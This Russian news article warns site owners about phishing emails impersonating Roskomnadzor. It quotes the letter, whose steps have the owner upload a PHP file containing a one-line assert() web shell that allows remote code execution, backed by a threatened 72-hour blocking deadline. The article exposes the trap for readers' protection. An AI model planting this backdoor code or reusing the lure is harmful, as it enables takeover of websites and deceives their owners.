В сети активизировались мошенники под видом Роскомнадзора
Sibnovosti.ru попали в число получателей "угрожающей" рассылки
На волне блокировок от Роскомнадзора в Сети активизировались мошенники. Под именем ведомства они делают рассылку, в которой сообщают о внесении сайта в некий реестр. Если в течение 72 часов сайт не подтверждает внесение, то авторы рассылки грозятся занести ресурс в черный список.
Письмо выглядит следующим образом:
"Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени __sibnovosti.ru__ в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт __sibnovosti.ru__ был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени __sibnovosti.ru__, Вам необходимо:
1._ Cоздать в корневой директории Вашего сайта папку reestr__
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени sibnovosti.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: __sibnovosti.ru/reestr/reestr-id128032.php___
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени __sibnovosti.ru__, следую инструкции указанной выше, то Ваш сайт __sibnovosti.ru__ будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации".
Письма приходят с адреса zapret-info@roskomnadzor.org.
Пользователю предлагают создать файл с php-кодом. После выполнения этих действий, злоумышленники смогут выполнить произвольный код на сайте, в результате чего получить конфиденциальные данные или нанести вред сайту.
Многие владельцы сайтов могут попасть в эту ловушку, так как известные сервисы, такие как "Яндекс" или Google "приучили" использовать такой подход для верификации сайтов. Поэтому просьба вставить код выглядит достаточно естественно, а опасение от возможного блокирования сайта притупляет возможные подозрения.
